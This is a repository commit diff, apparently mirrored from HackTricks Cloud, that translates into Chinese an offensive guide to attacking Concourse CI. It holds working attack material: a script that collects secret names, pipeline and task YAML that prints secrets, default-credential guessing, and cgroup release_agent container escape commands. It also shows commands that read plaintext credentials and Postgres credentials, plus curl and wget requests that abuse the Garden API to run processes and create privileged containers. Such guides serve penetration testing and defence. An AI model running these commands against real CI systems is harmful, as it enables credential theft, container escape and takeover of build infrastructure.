gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-27 15:24:32 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:05:38 +00:00
parent 94f24df656
commit 1e9dcd664b
245 changed files with 10145 additions and 12880 deletions
Download Patch File Download Diff File Expand all files Collapse all files

312
src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
View File

@@ -4,49 +4,47 @@
{{#include ../../banners/hacktricks-training.md}}
### User Roles & Permissions
### 用户角色与权限
Concourse comes with five roles:
Concourse 具有五个角色:
- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
- **owner**: Team owners can **modify everything within the team**.
- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
- _Concourse_ **管理员**:此角色仅授予 **主团队**(默认初始 concourse 团队)的所有者。管理员可以 **配置其他团队**(例如:`fly set-team``fly destroy-team`...)。此角色的权限无法通过 RBAC 进行影响。
- **所有者**:团队所有者可以 **修改团队内的所有内容**
- **成员**:团队成员可以在 **团队资产****读取和写入**,但无法修改团队设置。
- **管道操作员**:管道操作员可以执行 **管道操作**,例如触发构建和固定资源,但无法更新管道配置。
- **查看者**:团队查看者对团队及其管道具有 **“只读”** 访问权限。
> [!NOTE]
> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
> 此外,**所有者、成员、管道操作员和查看者的角色权限可以通过配置 RBAC 进行修改**(更具体地说是其操作)。有关更多信息,请阅读:[https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
请注意,Concourse **将管道分组到团队中**。因此,属于某个团队的用户将能够管理这些管道,并且 **可能存在多个团队**。用户可以属于多个团队,并在每个团队中拥有不同的权限。
### Vars & Credential Manager
### 变量与凭证管理器
In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
在 YAML 配置中,您可以使用语法 `((_source-name_:_secret-path_._secret-field_))` 配置值。\
[来自文档:](https://concourse-ci.org/vars.html#var-syntax) **source-name 是可选的**,如果省略,将使用 [集群范围的凭证管理器](https://concourse-ci.org/vars.html#cluster-wide-credential-manager),或者可以 [静态提供值](https://concourse-ci.org/vars.html#static-vars)\
**可选的 \_secret-field**\_ 指定要读取的获取凭证上的字段。如果省略,凭证管理器可以选择从获取的凭证中读取“默认字段”,如果该字段存在。\
此外_**secret-path**_ 和 _**secret-field**_ 如果 **包含特殊字符**(如 `.` `:`),可以用双引号 `"..."` 括起来。例如,`((source:"my.secret"."field:1"))` 将把 _secret-path_ 设置为 `my.secret`,将 _secret-field_ 设置为 `field:1`
#### Static Vars
Static vars can be specified in **tasks steps**:
#### 静态变量
静态变量可以在 **任务步骤** 中指定:
```yaml
- task: unit-1.13
file: booklit/ci/unit.yml
vars: { tag: 1.13 }
file: booklit/ci/unit.yml
vars: { tag: 1.13 }
```
Or using the following `fly` **arguments**:
- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
- `-v` or `--var` `NAME=VALUE` 将字符串 `VALUE` 设置为变量 `NAME` 的值。
- `-y` or `--yaml-var` `NAME=VALUE` `VALUE` 解析为 YAML,并将其设置为变量 `NAME` 的值。
- `-i` or `--instance-var` `NAME=VALUE` `VALUE` 解析为 YAML,并将其设置为实例变量 `NAME` 的值。有关实例变量的更多信息,请参见 [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html)
- `-l` or `--load-vars-from` `FILE` 加载 `FILE`,这是一个包含变量名称与值映射的 YAML 文档,并设置所有变量。
#### Credential Management
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers:
在管道中可以通过不同方式指定 **Credential Manager**,请阅读 [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html)\
此外Concourse 支持不同的凭证管理器:
- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
@@ -59,160 +57,151 @@ Moreover, Concourse supports different credential managers:
- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
> 请注意,如果您对 Concourse 有某种 **写入访问权限**,您可以创建作业来 **提取这些秘密**,因为 Concourse 需要能够访问它们。
### Concourse Enumeration
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
为了枚举一个 concourse 环境,您首先需要 **收集有效凭证** 或找到一个 **认证令牌**,可能在 `.flyrc` 配置文件中。
#### Login and Current User enum
- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- Get configured **targets**:
- `fly targets`
- Get if the configured **target connection** is still **valid**:
- `fly -t <target> status`
- Get **role** of the user against the indicated target:
- `fly -t <target> userinfo`
- 要登录,您需要知道 **端点**、**团队名称**(默认是 `main`)和 **用户所属的团队**
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- 获取配置的 **targets**
- `fly targets`
- 获取配置的 **target 连接**是否仍然 **有效**
- `fly -t <target> status`
- 获取用户在指定目标下的 **角色**
- `fly -t <target> userinfo`
> [!NOTE]
> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
> 请注意,**API token** 默认保存在 `$HOME/.flyrc` 中,您在盗取机器时可以在那里找到凭证。
#### Teams & Users
- Get a list of the Teams
- `fly -t <target> teams`
- Get roles inside team
- `fly -t <target> get-team -n <team-name>`
- Get a list of users
- `fly -t <target> active-users`
- 获取团队列表
- `fly -t <target> teams`
- 获取团队内的角色
- `fly -t <target> get-team -n <team-name>`
- 获取用户列表
- `fly -t <target> active-users`
#### Pipelines
- **List** pipelines:
- `fly -t <target> pipelines -a`
- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- Get all pipeline **config declared vars**
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
- **列出** 管道:
- `fly -t <target> pipelines -a`
- **获取** 管道 yaml**敏感信息**可能在定义中找到):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- 获取所有管道 **配置声明的变量**
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- 获取所有 **管道使用的秘密名称**(如果您可以创建/修改作业或劫持容器,您可以提取它们):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
#### 容器与工作者
#### Containers & Workers
- 列出 **workers**:
- `fly -t <target> workers`
- 列出 **containers**:
- `fly -t <target> containers`
- 列出 **builds** (查看正在运行的内容):
- `fly -t <target> builds`
- List **workers**:
- `fly -t <target> workers`
- List **containers**:
- `fly -t <target> containers`
- List **builds** (to see what is running):
- `fly -t <target> builds`
### Concourse 攻击
### Concourse Attacks
#### Credentials Brute-Force
#### 凭证暴力破解
- admin:admin
- test:test
#### Secrets and params enumeration
#### 秘密和参数枚举
In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
在上一节中,我们看到如何 **获取管道使用的所有秘密名称和变量**。**变量可能包含敏感信息**,而 **秘密的名称在稍后尝试窃取它们时将非常有用**
#### Session inside running or recently run container
If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
#### 在运行或最近运行的容器内会话
如果您拥有足够的权限(**成员角色或更高**),您将能够 **列出管道和角色**,并使用以下命令直接进入 `<pipeline>/<job>` **容器**
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
有了这些权限,您可能能够:
With these permissions you might be able to:
- **窃取** **容器** 内部的秘密
- 尝试 **逃逸** 到节点
- 枚举/滥用 **云元数据** 端点(从 pod 和节点,如果可能的话)
- **Steal the secrets** inside the **container**
- Try to **escape** to the node
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
#### Pipeline Creation/Modification
If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
#### 管道创建/修改
如果您拥有足够的权限(**成员角色或更高**),您将能够 **创建/修改新管道。** 请查看这个例子:
```yaml
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
```
通过**修改/创建**新管道,您将能够:
With the **modification/creation** of a new pipeline you will be able to:
- **窃取** **秘密**(通过回显它们或进入容器并运行 `env`
- **逃逸**到**节点**(通过给予您足够的权限 - `privileged: true`
- 枚举/滥用**云元数据**端点(从 pod 和节点)
- **删除**创建的管道
- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
- **Delete** created pipeline
#### Execute Custom Task
This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
#### 执行自定义任务
这与之前的方法类似,但您可以**仅执行自定义任务**(这可能会更加**隐蔽**
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
type: registry-image
source:
repository: ubuntu
type: registry-image
source:
repository: ubuntu
run:
path: sh
args:
- -cx
- |
env
sleep 1000
path: sh
args:
- -cx
- |
env
sleep 1000
params:
SUPER_SECRET: ((super.secret))
SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
#### 从特权任务逃逸到节点
#### Escaping to the node from privileged task
In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
In the following PoC we are going to use the release_agent to escape with some small modifications:
在前面的部分中,我们看到如何**使用concourse执行特权任务**。这不会给容器提供与docker容器中的特权标志完全相同的访问权限。例如您不会在/dev中看到节点文件系统设备因此逃逸可能会更“复杂”。
在以下PoC中我们将使用release_agent进行逃逸并进行一些小的修改
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
> [!WARNING]
> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
> 正如您可能注意到的,这只是一个 [**常规 release_agent 逃逸**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md),只是修改了节点中 cmd 的路径
#### Escaping to the node from a Worker container
A regular release_agent escape with a minor modification is enough for this:
#### 从 Worker 容器逃逸到节点
一个常规的 release_agent 逃逸,稍作修改就足够了:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
#### 从Web容器逃逸到节点
#### Escaping to the node from the Web container
Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
However, it stores **local credentials in clear text**:
即使Web容器禁用了某些防御它也**不是以普通特权容器的身份运行**(例如,您**无法** **挂载**,并且**能力**非常**有限**,因此所有简单的逃逸容器的方法都是无效的)。
然而,它以明文形式存储**本地凭据**
```bash
cat /concourse-auth/local-users
test:test
@@ -319,11 +304,9 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
您可以使用该凭据**登录到网络服务器**并**创建一个特权容器并逃逸到节点**。
You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
在环境中,您还可以找到信息以**访问concourse使用的postgresql**实例(地址、**用户名**、**密码**和数据库等信息):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -344,39 +327,35 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
#### Abusing Garden Service - Not a real Attack
#### 滥用 Garden 服务 - 不是一个真正的攻击
> [!WARNING]
> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
> 这些只是关于该服务的一些有趣的笔记,但由于它仅在本地主机上监听,这些笔记不会带来我们尚未利用过的任何影响
By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
默认情况下,每个 concourse worker 将在 7777 端口运行一个 [**Garden**](https://github.com/cloudfoundry/garden) 服务。该服务由 Web 主机用于指示 worker **需要执行的内容**(下载镜像并运行每个任务)。这对攻击者来说听起来不错,但有一些很好的保护措施:
- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
Concourse workers run with high container privileges:
- 它仅**在本地暴露**127..0.0.1),我认为当 worker 通过特殊的 SSH 服务对 Web 进行身份验证时,会创建一个隧道,以便 Web 服务器可以**与每个 worker 内的 Garden 服务进行通信**。
- Web 服务器**每隔几秒监控运行的容器**,并且**意外的**容器会被**删除**。因此,如果您想要**运行自定义容器**,您需要**篡改** Web 服务器与 Garden 服务之间的**通信**。
Concourse workers 以高容器权限运行:
```
Container Runtime: docker
Has Namespaces:
pid: true
user: false
pid: true
user: false
AppArmor Profile: kernel
Capabilities:
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
然而,像**挂载**节点的 /dev 设备或 release_agent 的技术**不会工作**(因为节点的真实设备与文件系统不可访问,只有一个虚拟设备)。我们无法访问节点的进程,因此在没有内核漏洞的情况下逃离节点变得复杂。
> [!NOTE]
> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
> 在上一节中,我们看到如何从特权容器中逃脱,因此如果我们可以在**当前** **工作者**创建的**特权容器****执行**命令,我们就可以**逃离到节点**
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
**Getting inside a running privileged container**
请注意,在玩弄 concourse 时,我注意到当一个新容器被生成以运行某些东西时,容器进程可以从工作者容器访问,因此就像一个容器在内部创建一个新容器。
**进入一个正在运行的特权容器**
```bash
# Get current container
curl 127.0.0.1:7777/containers
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
**创建一个新的特权容器**
**Creating a new privileged container**
You can very easily create a new container (just run a random UID) and execute something on it:
您可以非常轻松地创建一个新容器(只需运行一个随机 UID并在其上执行某些操作
```bash
curl -X POST http://127.0.0.1:7777/containers \
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
然而网络服务器每隔几秒钟检查正在运行的容器如果发现意外的容器它将被删除。由于通信是在HTTP中进行的您可以篡改通信以避免意外容器的删除
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
@@ -434,13 +409,8 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
## References
## 参考
- https://concourse-ci.org/vars.html
{{#include ../../banners/hacktricks-training.md}}